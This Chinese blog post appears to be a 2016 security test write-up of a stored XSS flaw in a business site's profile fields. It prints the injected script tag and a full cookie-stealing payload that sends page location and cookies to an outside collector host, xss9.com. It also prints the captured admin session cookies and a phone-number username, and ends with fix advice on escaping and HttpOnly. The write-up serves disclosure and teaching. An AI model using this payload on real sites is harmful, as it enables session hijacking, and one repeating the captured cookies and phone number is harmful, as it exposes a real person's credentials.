跳转至

XSS跨站攻击示例


2016-06-01 by dongnan

漏洞描述

某个业务系统,进行安全测试,发现XSS漏洞,信息如下。

  • 危害等级: 高
  • 漏洞详情: 在完善资料时插入恶意代码,获取管理员 cookie (俗称 XSS)。
  • 漏洞描述: 没有过滤恶意代码而导致跨站脚本攻击。
  • 存在问题的URL: https://qy.ywwd.net/user/qyzz

修复建议

  • 过滤标签转义。
  • 加密 cookie 信息并设置 httponly 标志。

漏洞详细信息

资料填写时,在企业地址,企业简介,企业法人姓名中插入的代码如下

"><script src=" http://************"></script>

跨站连接URL

http://xss9.com//5aBzKE?1457784814
(function(){(new Image()).src=
'http://xss9.com/index.php?do=api&id=5aBzKE&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())
+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())
+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())
+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?
window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xss9.com/index.php?
do=keepsession&id=5aBzKE&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

台成功收到后台管理员 cookie,在 cookie 中还是能清楚的看到账号。

Url:http://admin.qy.zzh.ywwd.net/?_c=kuozhan&_a=duanxinlog
Cookie:UUID=c5079720-775d-90cc-4418-56a5a1fb705c; Hm_lvt_d5397186e
uname=13260115331
51cba200d234857ce5d27ab=1456196189,1456710178,1457315679,1457509525
; PHPSESSID=7952f2d2bf5d37d4570de948307d96f8; TRADE_ADMIN_PASSPOR
T_MEMBER_LOCAL=uid%3D1%26uname%3D13260115331%26register_type%3D1%26
expire%3D1458098764%26timestamp%3D1457925964%26version%3D0.1%26sign
%3Dc845db0237cda05e6fd8627384ed640fe6c842f3; TRADE_ADMIN_PASSPORT_
MEMBER=uid%3D1%26uname%3D13260115331%26register_type%3D1%26expire%3
D1458267612%26timestamp%3D1458094812%26version%3D0.1%26sign%3D271e2
573d410d9dd059cfc1dbe32d99c3ba41f19; Hm_lpvt_d5397186e51cba200d234
857ce5d27ab=1457925374; s_src=; OFFLINE_ADMIN_PASSPORT_MEMBER=uid
%3D117%26uname%3D13260115331%26register_type%3D1%26expire%3D1458100
130%26timestamp%3D1457927330%

扩展

HttpOnly

如果 cookie 中设置了 HttpOnly 属性,那么通过js脚本将无法读取到cookie信息, 这样能有效的防止XSS攻击窃取cookie内容,增加了cookie的安全性。

XSS

XSS 全称 Cross SiteScript 跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。

其原理是攻击者向有XSS漏洞的网站中加入恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行从而达到攻击的目的。 例如盗取用户 Cookie、重定向到其它网站等。

回到页面顶部